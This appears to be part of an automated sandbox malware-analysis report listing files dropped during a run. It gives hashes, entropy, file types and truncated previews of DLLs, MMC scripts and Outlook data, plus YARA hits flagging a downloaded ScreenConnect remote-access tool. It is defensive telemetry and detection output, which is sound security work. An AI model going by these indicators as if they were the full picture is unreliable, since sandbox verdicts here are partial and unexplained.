                                                                                                                          Reputation:unknown
                                                                                                                          Preview:........................................;...{..1 ...}i.. ...{........... ...{... ...{..#.#.. ...{.|....................1 ...}i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:F1D3FF8443297732862DF21DC4E57262
                                                                                                                          SHA1:9069CA78E7450A285173431B3E52C5C25299E473
                                                                                                                          SHA-256:DF3F619804A92FDB4057192DC43DD748EA778ADC52BC498CE80524C014B81119
                                                                                                                          SHA-512:EC2D57691D9B2D40182AC565032054B7D784BA96B18BCB5BE0BB4E70E3FB041EFF582C8AF66EE50256539F2181D7F9E53627C0189DA7E75A4D5EF10EA93B20B3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:....
                                                                                                                          Process:C:\Windows\System32\mmc.exe
                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3413
                                                                                                                          Entropy (8bit):5.084486589571248
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A726593A8261930E4786375106FC6BFE
                                                                                                                          SHA1:13916B1E1825549E9C36C64E35BACA204A83EF95
                                                                                                                          SHA-256:E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172
                                                                                                                          SHA-512:B093A2513B2C4F8544093D6E983EC580E14625E1529BC3DB22C4011980CDF44A78443C22289B11A6ED0AFAE2786D480F94B354B71496EE022E439D2BDEFBEDD2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<html>.... <head>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8">.. <style>.. body {margin: 0; font: icon; color: windowtext; background:window; overflow:none}.. span {font:icon;}.. #FolderIcon {height:expression(TaskpadName.clientHeight + 10); width:100%;}.. #TaskpadName {font: caption; color:captiontext; margin-left:0; margin-right:0; margin-top: 0; width:100%; border:0; padding-left:3; padding-top:5; padding-bottom:7;}.. #DisplayNameElem {font:icon; padding-left:5px; padding-top:5px; padding-bottom:3px; padding-right:5px}.. #Details {padding-left: 12px; margin-top: 8px; overflow:auto}.. #DescriptionElem {padding-left: 12px; margin-top: 8px; overflow-y:scroll; overflow:auto}.. A:visited {color:expression(document.linkColor);}.. A:hover {color:expression(document.linkColor);}.. </style>.... <script language="javascript">.. var L_strNoItemSelected_Text
                                                                                                                          Process:C:\Windows\System32\mmc.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1835
                                                                                                                          Entropy (8bit):4.8246355222783786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:BEE1758A485085BB8A121EB74BA7E96F
                                                                                                                          SHA1:8024492E1126B17F832E36C932D433200180B693
                                                                                                                          SHA-256:EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E
                                                                                                                          SHA-512:BB1FE94A523EF108C49F75DA187FCC28BBF80D72233454C329134BEE2E12268D3DA344A622987B081612AA2A1EDAC8B91EEF27619C7309517AC52E7AEBF32F1A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..function OnLoad()..{.. ViewPanel.addBehavior("#default#mmcview");.. MMCEvents.ConnectTo(external.Document.Application);.. UpdateState();..}....// Prevent text from being selected and messing up the UI...function document.onselectstart()..{.. event.returnValue = false;..}....function UpdateState()..{.. var strDetails = "";.. var strDisplayName = "";.. var strDescription = "";.. var i;.. var curnode;.. var strNodeType;.... N = external.Selection;.... switch(N.count).. {.. case 0:.. DisplayNameElem.style.fontWeight="normal";.. strDetails = "";.. strDisplayName = L_strNoItemSelected_Text;.. break;.... case 1:.. DisplayNameElem.style.fontWeight="bold";.. strDetails = "";.. curNode = N(1);.... // got the selected node.. strNodeType = curNode.Nodetype;.. strDisplayName = external.CellContents(curNode, 1);.. strDescription = curNode.Property("CCF_DESCRIPTION");..
                                                                                                                          Process:C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe
                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):180025
                                                                                                                          Entropy (8bit):5.29668201419059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:35167385829C6E71CBE9EC51CC43220B
                                                                                                                          SHA1:30B8A7D3ABD3CF678B82E37986FEAAD9B407D56E
                                                                                                                          SHA-256:45A725CAFBE202D49BDD43582CB7C1C44610B1FD69274BED21CCEEDE06B9C945
                                                                                                                          SHA-512:3047CBA8AFFBEF5CD4DEA1446BB983028A6CEC40F7ED0BAEF05FAD90F1224F9339C888A8E57954F44E2F2BD956630C9A58600CD1A8A737B467289A87E67FA01B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2025-03-07T22:32:57">.. Build: 16.0.18413.40127-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results?fullframe=yes</o:url>.. <o:ticket o:policy="DELEGATION" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Bearer {}" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.Resourc
                                                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1088808
                                                                                                                          Entropy (8bit):7.794014860337275
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:4ABAD4FD1A22BC922B457C28D1E40F1A
                                                                                                                          SHA1:FC5A486B121175B547F78D9B8FC82FD893FCF6ED
                                                                                                                          SHA-256:DB51E4B70F27D0BF28789EA3345BF693035916461D22661C26F149C5BC8891ED
                                                                                                                          SHA-512:21D52CCF5B5041319A007F72C5CD5830F2A99E7B0AB2B946A87A25ADEBB78D6FBE1FF95A01F26E530A0D30D838560D8ACF716E0C43AEB5AD69334A897456A5A1
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):234
                                                                                                                          Entropy (8bit):4.977464602412109
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                                                          SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                                                          SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                                                          SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):4.62694170304723
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                                                          SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                                                          SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                                                          SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):36864
                                                                                                                          Entropy (8bit):4.340550904466943
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                                                          SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                                                          SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                                                          SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):57344
                                                                                                                          Entropy (8bit):4.657268358041957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                                                          SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                                                          SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                                                          SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):176128
                                                                                                                          Entropy (8bit):5.775360792482692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                                                          SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                                                          SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                                                          SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11776
                                                                                                                          Entropy (8bit):5.276434818345727
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7572B9AE2ECF5946645863A828678B5A
                                                                                                                          SHA1:438A5BE706775626768D24BA5F25C454920AD2F2
                                                                                                                          SHA-256:D09447D4816E248C16891361D87019156CC7664B213357A8E6C422484B8D6B4E
                                                                                                                          SHA-512:B1CEE9458BE3579A02B6F7E8D0B76F67A4B2D1F170DB2E09AF75D9901723E80E68650FE8FBBE43C8F062DF7D50889E224B7CD9767027A0D7A5121A4534F2AFA4
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....S..........." ..0..&...........E... ...`....... ..............................2v....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...4%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726976
                                                                                                                          Entropy (8bit):6.6400445410513145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7099C67FE850D902106C03D07BFB773B
                                                                                                                          SHA1:F597D519A59A5FD809E8A1E097FDD6E0077F72DE
                                                                                                                          SHA-256:2659F660691D65628D2FCC3BFC334686CD053F162CDB73BF7A0DA0AC6449DB92
                                                                                                                          SHA-512:17849CB444D3AC2CD4658D4ECA9DC89652BEAE6C6A2BD765749D8BA53E37248FD92A00AF2B45371C21182135FFFA6DD96DC9570BFD41459F23E084C3E122D162
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=..........." ..0..R...........q... ........... ....................................@..................................p..O.......|............................p..8............................................ ............... ..H............text....Q... ...R.................. ..`.rsrc...|............T..............@..@.reloc...............X..............@..B.................p......H.......................d...0....o........................................(+...*^.(+..........%...}....*:.(+.....}....*:.(+.....}....*:.(+.....}....*..s,...*..s-...*:.(......(/...*..{0...*"..}0...*J.(1........(2...&*:.(......(3...*..{4...*"..}4...*.0..(........(5......+.............(2...&..X....i2.*v.(.....s6...}.....s7...}....*v.{.....r...p(...+.....o9....*.0...........o:....+..o;......(...+&.o....-....,..o......*..........."........{..........o<...&.......(.....*....0..L...
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):90112
                                                                                                                          Entropy (8bit):4.475749173992463
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:95F6CB8E0AB8C67F4C76E1AF97A18151
                                                                                                                          SHA1:BA2413B4C4103C109798EE69C821B92CAD58C4A2
                                                                                                                          SHA-256:0FB819C9D688588513C30DEA91EF069B84A2ACF027AEB25F3E63D90A760FD957
                                                                                                                          SHA-512:232FD6098D01F8C708791DAB73E701702F7F0E88937BD8651AE0CFF2D549E8BA30F1D6B37FBAD643ABC4AFE85A3AE6CEB7BEF3D4A74D01EA970638AF21F5DE2B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:............................................................................`............r?....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...............................................................4............r?............v.2._.O.U.T.L.O.O.K.:.1.a.e.c.:.d.f.9.c.2.f.1.9.1.2.b.5.4.7.3.e.8.4.5.7.7.c.a.3.6.d.b.6.2.c.3.2...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.0.7.T.1.7.3.2.4.0.0.9.0.5.-.6.8.9.2...e.t.l.......P.P..........r?............................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:GIF image data, version 89a, 15 x 15
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):663
                                                                                                                          Entropy (8bit):5.949125862393289
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                          SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                          SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                          SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):163840
                                                                                                                          Entropy (8bit):0.46720383620404843
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:0C0503D44042B7883ED2203780DF4CC2
                                                                                                                          SHA1:AB04ED6888C24A8573E99E3467A7BDFA1F58F0EE
                                                                                                                          SHA-256:44D02EE2804A17197621355790380ED853C3C30893DAA42B1B431EB787471A1F
                                                                                                                          SHA-512:D8496D93721F01123FE95970E0818E1036A49A802AA693602DD5C2FCF6814BD5F5A3272ACB6B6681A5E36222991B05BCDF4286812C907183FF9F54F60B6DAF43
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:Microsoft Outlook email folder (>=2003)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):271360
                                                                                                                          Entropy (8bit):1.5027795538163893
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:71EEA40A5EE35845C7139443CBD77D8F
                                                                                                                          SHA1:BF0D5C8D828245025FC7D7096DC313872F47404E
                                                                                                                          SHA-256:BF28709B84D2D6685F29A2EE67292C2C348618C5B30BA5BCCBB43BBE94CCDE3D
                                                                                                                          SHA-512:7E50DD0C1BE7C4DD8C82C096F94412E1234A2B47F7F850360F1CD37BF6F45DA0C25F777585635D0B3EC76088E39D76D796BDE8A5488144BC7E112E628F555DB9
                                                                                                                          Malicious:true
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:!BDNg...SM......\......................\................@...........@...@...................................@...........................................................................$.......D.......D..........................................................................................................................................................................................................................................................................................................................H........,.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):131072
                                                                                                                          Entropy (8bit):1.0189936431520732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:62097054111037E452F31ED4DB42E565
                                                                                                                          SHA1:5D098B0A987AE3F82B0BEC777C4427657CD51B89
                                                                                                                          SHA-256:4F8C1E4B54D1AD1376BE3C73ABC3249F23ED1ACF04016B94BBEE82AD209A023A
                                                                                                                          SHA-512:1504070BDBD987E33C63C4EF38B38A97EC31AB9C15B40AC61FE2AB1FE03533509FE20B390415009943086F0A5999F4E23A8FD1C890C19A001BC3885A041D91F5
                                                                                                                          Malicious:true
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:..~.0...R............h..........D............#......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................-...D.........$0...S............h..........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34269
                                                                                                                          Entropy (8bit):6.497594965464524
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:7BE7E5F05B811BBE825E8C26D5F01995
                                                                                                                          SHA1:70006841AF9C8245DC9B64C34BA5E90B8B696C7D
                                                                                                                          SHA-256:22FE94D19E25F3654C9A37FDD5DCE91F5872B4315B8030505820797EA247AC99
                                                                                                                          SHA-512:02051CE1CAFEC2E2649EC36722AAB2844764764B1451ECF508905700825746A6BF954D8D5B0F616B3F54304E3692EB12E552B091D8721404EC58DBFB17B98625
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.....bAU...@..................................)..P....`..tHS..........zT. j....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...tHS..`...JS.. ..............@..@.reloc........T......jT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:CE833A8BD46CB8C28B9D2AF97030E676
                                                                                                                          SHA1:263E317B6E026399DC272A26CBAC6569E4095BFF
                                                                                                                          SHA-256:AD53C37F7F554A3D4D2D26D3CD445D764048712136DD2F2EEA1640939913AB59
                                                                                                                          SHA-512:E8E7078A810751408874CF41CB4971BB50250A7D38FA5CF07CA2BCE3D4E9A90A208CB426059F3DCA39B7714F065006CDEB52A575369A50CC73C6294B30D13CEB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.....bAU...@..................................)..P....`..tHS..........zT. j....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...tHS..`...JS.. ..............@..@.reloc........T......jT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):0
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:911525671C9FD23005A07459B729B754
                                                                                                                          SHA1:82962D1876B03561895156C22A6E68925E01418D
                                                                                                                          SHA-256:67B909BBCCE486BABA59D66E3B4EC4C74DD64782051A41198085A5B3450D00C9
                                                                                                                          SHA-512:E6666C83C3C817B2E378C13D04182013F9A44205B05755DBF41CEE64D49DF32E509D12BF17134F0529CBDE52C2C6A51BFD7CC60D013264827FEE2F2D56330C70
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!......S...................@...........................T.....bAU...@..................................)..P....`..tHS..........zT. j....T..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...tHS..`...JS.. ..............@..@.reloc........T......jT.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5628960
                                                                                                                          Entropy (8bit):7.430705315269971
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:911525671C9FD23005A07459B729B754
                                                                                                                          SHA1:82962D1876B03561895156C22A6E68925E01418D
                                                                                                                          SHA-256:67B909BBCCE486BABA59D66E3B4EC4C74DD64782051A41198085A5B3450D00C9
                                                                                                                          SHA-512:E6666C83C3C817B2E378C13D04182013F9A44205B05755DBF41CEE64D49DF32E509D12BF17134F0529CBDE52C2C6A51BFD7CC60D013264827FEE2F2D56330C70
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\Downloads\Unconfirmed 111805.crdownload, Author: Joe Security
                                                                                                                          Reputation:unknown
